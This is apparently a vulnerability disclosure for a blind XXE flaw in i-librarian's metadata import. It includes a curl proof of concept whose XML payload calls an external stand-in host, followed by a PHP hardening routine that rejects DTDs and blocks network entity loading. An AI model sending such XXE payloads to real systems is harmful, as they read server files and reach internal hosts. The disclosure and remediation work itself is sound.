if (!$xml = @simplexml_load_string($_POST['form_import_textarea'])) {
$_FILES['form_import_file']['tmp_name'] is passed into simplexml_load_file(), and $_POST['form_import_textarea'] is passed into simplexml_load_string().
This creates a Blind XXE vulnerability.
By XXE, an attacker can read the contents of a file on the target host and attack other hosts on the intranet (SSRF).
POC:
[sn00py.B0x] ➤ curl --request POST 'http://127.0.0.1/librarian/importmetadata.php' --cookie "PHPSESSID=fvp5dermov0tv3fqtdblc7c677" --data "form_sent=1&file_type=endnote&form_import_file=1" --data-urlencode 'form_import_textarea=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY entity SYSTEM "http://hack.me:1337/xxe_test">]><root>&entity;</root>'
Done. Total items recorded: 0
i-librarian/importmetadata.php, line 139 (commit 9535753)
i-librarian/importmetadata.php, line 153 (commit 9535753)
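The mitigation the report points at is to stop handing user-controlled XML to simplexml_load_file()/simplexml_load_string() with default parser behaviour. The following is an added hardening example written for this report; it is not code from the i-librarian project. The function names load_untrusted_xml() and load_untrusted_xml_file() are hypothetical, and the sample documents at the bottom are constructed inputs for a manual check.

```php
<?php
// Added hardening example (not i-librarian's own code): one guarded loader that
// both call sites in importmetadata.php (file upload and textarea) could use
// instead of calling simplexml_load_file()/simplexml_load_string() directly.

function load_untrusted_xml(string $xml): ?SimpleXMLElement
{
    // 1. Refuse any DOCTYPE outright. Imported metadata never needs a DTD, and
    //    every XXE payload (internal, external or parameter entity) requires one.
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        return null;
    }

    // 2. On PHP < 8.0 explicitly disable external entity loading in libxml.
    //    PHP 8.0+ (libxml >= 2.9) disables it by default and deprecates the call.
    $previousLoaderState = null;
    if (PHP_VERSION_ID < 80000) {
        $previousLoaderState = libxml_disable_entity_loader(true);
    }

    // 3. Collect parser errors internally instead of emitting warnings to the response.
    $previousErrorState = libxml_use_internal_errors(true);

    // 4. Parse with LIBXML_NONET so the parser cannot open network resources, and
    //    without LIBXML_NOENT / LIBXML_DTDLOAD, which would re-enable entity
    //    substitution and DTD loading.
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);

    // 5. Restore the global libxml state we changed.
    libxml_clear_errors();
    libxml_use_internal_errors($previousErrorState);
    if ($previousLoaderState !== null) {
        libxml_disable_entity_loader($previousLoaderState);
    }

    return $doc === false ? null : $doc;
}

// Wrapper for the uploaded-file path: read the temp file ourselves so the same
// checks apply, instead of passing the path to simplexml_load_file().
function load_untrusted_xml_file(string $path): ?SimpleXMLElement
{
    $contents = file_get_contents($path);
    return $contents === false ? null : load_untrusted_xml($contents);
}

// Constructed sample inputs for a manual check (run with: php this_file.php).
$benign      = '<?xml version="1.0"?><root><title>Example</title></root>';
$withDoctype = '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY e "x">]><root>&e;</root>';

var_dump(load_untrusted_xml($benign) instanceof SimpleXMLElement);
var_dump(load_untrusted_xml($withDoctype));
```

The DOCTYPE check is a defence in depth on top of the parser flags, not a replacement for them: it is a plain substring match on the raw bytes, so if an upload may arrive in a non-UTF-8 encoding it should be transcoded to UTF-8 before the check. Rejecting the whole document is the right outcome for an import feature, since a DTD carries no information the metadata importer uses.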